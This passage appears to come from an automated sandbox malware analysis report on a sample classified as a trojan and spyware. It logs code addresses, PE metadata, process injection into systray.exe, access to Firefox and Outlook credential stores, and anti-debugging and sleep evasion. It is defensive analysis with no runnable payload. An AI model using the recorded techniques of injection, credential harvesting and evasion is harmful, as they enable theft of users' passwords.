              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011659100_2_01165910
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D99500_2_010D9950
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EB9500_2_010EB950
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113D8000_2_0113D800
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D38E00_2_010D38E0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118FB760_2_0118FB76
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EFB800_2_010EFB80
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01145BF00_2_01145BF0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0110DBF90_2_0110DBF9
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118FA490_2_0118FA49
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01187A460_2_01187A46
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01143A6C0_2_01143A6C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01115AA00_2_01115AA0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01171AA30_2_01171AA3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116DAAC0_2_0116DAAC
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0117DAC60_2_0117DAC6
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01181D5A0_2_01181D5A
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D3D400_2_010D3D40
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01187D730_2_01187D73
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EFDC00_2_010EFDC0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01149C320_2_01149C32
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118FCF20_2_0118FCF2
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118FF090_2_0118FF09
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D1F920_2_010D1F92
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118FFB10_2_0118FFB1
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D9EB00_2_010D9EB0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052005354_2_05200535
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052C05914_2_052C0591
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052A44204_2_052A4420
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052B24464_2_052B2446
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052AE4F64_2_052AE4F6
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052007704_2_05200770
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052247504_2_05224750
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_051FC7C04_2_051FC7C0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0521C6E04_2_0521C6E0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_051F01004_2_051F0100
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0529A1184_2_0529A118
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052881584_2_05288158
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052C01AA4_2_052C01AA
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052B81CC4_2_052B81CC
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052920004_2_05292000
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BA3524_2_052BA352
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052C03E64_2_052C03E6
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0520E3F04_2_0520E3F0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052A02744_2_052A0274
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052802C04_2_052802C0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0520AD004_2_0520AD00
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0529CD1F4_2_0529CD1F
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05218DBF4_2_05218DBF
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_051FADE04_2_051FADE0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05200C004_2_05200C00
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052A0CB54_2_052A0CB5
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_051F0CF24_2_051F0CF2
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05242F284_2_05242F28
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05220F304_2_05220F30
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052A2F304_2_052A2F30
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05274F404_2_05274F40
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0527EFA04_2_0527EFA0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0520CFE04_2_0520CFE0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_051F2FC84_2_051F2FC8
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BEE264_2_052BEE26
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05200E594_2_05200E59
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05212E904_2_05212E90
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BCE934_2_052BCE93
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BEEDB4_2_052BEEDB
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052169624_2_05216962
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052029A04_2_052029A0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052CA9A64_2_052CA9A6
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0520A8404_2_0520A840
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052028404_2_05202840
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_051E68B84_2_051E68B8
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0522E8F04_2_0522E8F0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BAB404_2_052BAB40
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052B6BD74_2_052B6BD7
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_051FEA804_2_051FEA80
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052B75714_2_052B7571
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0529D5B04_2_0529D5B0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BF43F4_2_052BF43F
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_051F14604_2_051F1460
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BF7B04_2_052BF7B0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052B16CC4_2_052B16CC
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052CB16B4_2_052CB16B
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0523516C4_2_0523516C
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_051EF1724_2_051EF172
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0520B1B04_2_0520B1B0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052B70E94_2_052B70E9
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BF0E04_2_052BF0E0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052070C04_2_052070C0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052AF0CC4_2_052AF0CC
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052B132D4_2_052B132D
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_051ED34C4_2_051ED34C
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0524739A4_2_0524739A
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052052A04_2_052052A0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052A12ED4_2_052A12ED
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0521B2C04_2_0521B2C0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052B7D734_2_052B7D73
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05203D404_2_05203D40
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052B1D5A4_2_052B1D5A
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0521FDC04_2_0521FDC0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05279C324_2_05279C32
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BFCF24_2_052BFCF2
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BFF094_2_052BFF09
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BFFB14_2_052BFFB1
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05201F924_2_05201F92
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05209EB04_2_05209EB0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052959104_2_05295910
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052099504_2_05209950
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0521B9504_2_0521B950
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0526D8004_2_0526D800
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052038E04_2_052038E0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BFB764_2_052BFB76
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0521FB804_2_0521FB80
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05275BF04_2_05275BF0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0523DBF94_2_0523DBF9
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05273A6C4_2_05273A6C
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BFA494_2_052BFA49
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052B7A464_2_052B7A46
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05245AA04_2_05245AA0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0529DAAC4_2_0529DAAC
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052A1AA34_2_052A1AA3
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052ADAC64_2_052ADAC6
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_032121604_2_03212160
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0320CFCF4_2_0320CFCF
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0320CFD04_2_0320CFD0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0320B32A4_2_0320B32A
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0320B3304_2_0320B330
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0320B1E04_2_0320B1E0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0320D1F04_2_0320D1F0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0320B1DF4_2_0320B1DF
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_03213A004_2_03213A00
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_032139FB4_2_032139FB
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_032158004_2_03215800
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0322BEE04_2_0322BEE0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04FAE4534_2_04FAE453
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04FAE7ED4_2_04FAE7ED
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04FAE3344_2_04FAE334
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04FAD8B84_2_04FAD8B8
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: String function: 0114F290 appears 105 times
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: String function: 010BB970 appears 280 times
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: String function: 01117E54 appears 111 times
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: String function: 0113EA12 appears 86 times
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: String function: 01105130 appears 58 times
              Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 0526EA12 appears 86 times
              Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 0527F290 appears 105 times
              Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 051EB970 appears 280 times
              Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 05247E54 appears 102 times
              Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 05235130 appears 58 times
              Source: JJ0tnjLiDS.exeStatic PE information: No import functions for PE file found
              Source: JJ0tnjLiDS.exe, 00000000.00000002.2472917406.00000000011BD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs JJ0tnjLiDS.exe
              Source: JJ0tnjLiDS.exe, 00000000.00000003.2379955192.000000000100C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs JJ0tnjLiDS.exe
              Source: JJ0tnjLiDS.exe, 00000000.00000003.2441837305.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesystray.exej% vs JJ0tnjLiDS.exe
              Source: JJ0tnjLiDS.exe, 00000000.00000003.2378014479.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs JJ0tnjLiDS.exe
              Source: JJ0tnjLiDS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: JJ0tnjLiDS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: JJ0tnjLiDS.exeStatic PE information: Section .text
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@16/9
              Source: C:\Windows\SysWOW64\systray.exeFile created: C:\Users\user\AppData\Local\Temp\at8-FI0kJump to behavior
              Source: JJ0tnjLiDS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: systray.exe, 00000004.00000002.4495421876.000000000350F000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4495421876.00000000034FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: JJ0tnjLiDS.exeVirustotal: Detection: 61%
              Source: JJ0tnjLiDS.exeReversingLabs: Detection: 64%
              Source: unknownProcess created: C:\Users\user\Desktop\JJ0tnjLiDS.exe "C:\Users\user\Desktop\JJ0tnjLiDS.exe"
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeProcess created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"
              Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeProcess created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: JJ0tnjLiDS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: systray.pdb source: JJ0tnjLiDS.exe, 00000000.00000003.2441837305.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, x6fGRpae78G.exe, 00000003.00000002.4495681865.00000000012AE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: systray.pdbGCTL source: JJ0tnjLiDS.exe, 00000000.00000003.2441837305.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, x6fGRpae78G.exe, 00000003.00000002.4495681865.00000000012AE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: JJ0tnjLiDS.exe, 00000000.00000002.2472917406.000000000122E000.00000040.00001000.00020000.00000000.sdmp, JJ0tnjLiDS.exe, 00000000.00000002.2472917406.0000000001090000.00000040.00001000.00020000.00000000.sdmp, JJ0tnjLiDS.exe, 00000000.00000003.2378014479.0000000000D2C000.00000004.00000020.00020000.00000000.sdmp, JJ0tnjLiDS.exe, 00000000.00000003.2379955192.0000000000EDF000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.2474650543.0000000005010000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.2472850298.0000000004E63000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4496330881.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4496330881.000000000535E000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: JJ0tnjLiDS.exe, JJ0tnjLiDS.exe, 00000000.00000002.2472917406.000000000122E000.00000040.00001000.00020000.00000000.sdmp, JJ0tnjLiDS.exe, 00000000.00000002.2472917406.0000000001090000.00000040.00001000.00020000.00000000.sdmp, JJ0tnjLiDS.exe, 00000000.00000003.2378014479.0000000000D2C000.00000004.00000020.00020000.00000000.sdmp, JJ0tnjLiDS.exe, 00000000.00000003.2379955192.0000000000EDF000.00000004.00000020.00020000.00000000.sdmp, systray.exe, systray.exe, 00000004.00000003.2474650543.0000000005010000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.2472850298.0000000004E63000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4496330881.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4496330881.000000000535E000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: x6fGRpae78G.exe, 00000003.00000002.4495152615.0000000000A5F000.00000002.00000001.01000000.00000005.sdmp, x6fGRpae78G.exe, 00000006.00000002.4495151605.0000000000A5F000.00000002.00000001.01000000.00000005.sdmp
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CEA9C9 pushad ; retf 0_2_00CEAA00
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CD31D0 push eax; ret 0_2_00CD31D2
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CE7D8E push FFFFFFC9h; retf 0_2_00CE7D90
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CDD6C1 push ebp; ret 0_2_00CDD6C2
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CEEFF2 push cs; iretd 0_2_00CEEFFB
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C09AD push ecx; mov dword ptr [esp], ecx0_2_010C09B6
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01091344 push eax; iretd 0_2_01091369
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_051F09AD push ecx; mov dword ptr [esp], ecx4_2_051F09B6
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_03214BBB push FFFFFFC9h; retf 4_2_03214BBD
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_03212836 push esi; ret 4_2_03212838
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_032177F6 pushad ; retf 4_2_0321782D
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0321F440 push eax; ret 4_2_0321F450
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0321BE1F push cs; iretd 4_2_0321BE28
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04FAC454 push ds; iretd 4_2_04FAC47C
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04FAB687 pushfd ; ret 4_2_04FAB688
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04FAC753 push ss; iretd 4_2_04FAC761
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04FB0084 pushfd ; ret 4_2_04FB0087
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04FAF16D push esp; ret 4_2_04FAF17D
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04FAFD74 push ecx; iretd 4_2_04FAFDC2
              Source: JJ0tnjLiDS.exeStatic PE information: section name: .text entropy: 7.996319502854974
              Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Switches to a custom stack to bypass stack traces
              Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
              Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
              Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
              Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
              Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
              Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
              Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
              Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0110096E rdtsc 0_2_0110096E
              Source: C:\Windows\SysWOW64\systray.exeWindow / User API: threadDelayed 2454Jump to behavior
              Source: C:\Windows\SysWOW64\systray.exeWindow / User API: threadDelayed 7518Jump to behavior
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeAPI coverage: 0.7 %
              Source: C:\Windows\SysWOW64\systray.exeAPI coverage: 2.7 %
              Source: C:\Windows\SysWOW64\systray.exe TID: 5596Thread sleep count: 2454 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\systray.exe TID: 5596Thread sleep time: -4908000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\systray.exe TID: 5596Thread sleep count: 7518 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\systray.exe TID: 5596Thread sleep time: -15036000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe TID: 1564Thread sleep time: -80000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe TID: 1564Thread sleep count: 37 > 30Jump to behavior
